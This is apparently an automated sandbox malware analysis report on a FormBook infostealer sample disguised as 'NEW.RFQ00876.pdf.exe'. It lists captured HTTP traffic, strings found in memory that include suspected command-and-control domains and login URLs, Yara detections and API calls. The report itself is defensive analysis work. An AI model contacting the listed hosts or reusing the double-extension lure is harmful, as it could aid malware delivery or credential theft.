                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 09 Dec 2024 05:58:56 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 67 79 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:04 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:06 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:09 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 09 Dec 2024 05:59:12 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 05:59:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 05:59:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 05:59:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 06:00:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 06:00:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5n9htlE53RLATzMY9d8jJAh1SDks7HYQydUImQswIagl3ykdUIVmDAQ2hGQSTO39Q%2Baqsar64qYuG%2Fa4JT6pkJs7EhOa2D8rPEQskYrd%2BEgAz6vQ58eQ2sccnuwL5N2Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ef2c66b2aea7c87-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=817&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RAangyFeHdZLco.exe, 00000014.00000002.1407964518.0000000002725000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3733834808.00000000054AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3733834808.00000000054AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top/ge5i/
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: msinfo32.exe, 0000001A.00000002.3732924393.0000000005F80000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003D60000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gamesfunny.top$
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: msinfo32.exe, 0000001A.00000003.1657000305.0000000007D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                Source: msinfo32.exe, 0000001A.00000002.3734619371.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732924393.0000000006A7E000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000485E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                Source: msinfo32.exe, 0000001A.00000002.3732924393.000000000522C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3731711084.00000000048AF000.00000004.00000020.00020000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.1770860245.0000000020BDC000.00000004.80000000.00040000.00000000.sdmp, NEW.RFQ00876.pdf.exe, RAangyFeHdZLco.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: msinfo32.exe, 0000001A.00000003.1665743408.0000000007D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: msinfo32.exe, 0000001A.00000002.3732924393.0000000005938000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003718000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9
                Source: msinfo32.exe, 0000001A.00000002.3732924393.0000000005938000.00000004.10000000.00040000.00000000.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.0000000003718000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&amp;PHM8hj-=h6bUgYM5oQIom3SHXrnUV9
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3732132912.00000000043A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD4610 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0CCD4610

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: NEW.RFQ00876.pdf.exe
                Source: initial sampleStatic PE information: Filename: NEW.RFQ00876.pdf.exe
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0042CA13 NtClose,15_2_0042CA13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892B60 NtClose,LdrInitializeThunk,15_2_01892B60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_01892DF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_01892C70
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018935C0 NtCreateMutant,LdrInitializeThunk,15_2_018935C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01894340 NtSetContextThread,15_2_01894340
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01894650 NtSuspendThread,15_2_01894650
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892B80 NtQueryInformationFile,15_2_01892B80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892BA0 NtEnumerateValueKey,15_2_01892BA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892BE0 NtQueryValueKey,15_2_01892BE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892BF0 NtAllocateVirtualMemory,15_2_01892BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892AB0 NtWaitForSingleObject,15_2_01892AB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892AD0 NtReadFile,15_2_01892AD0
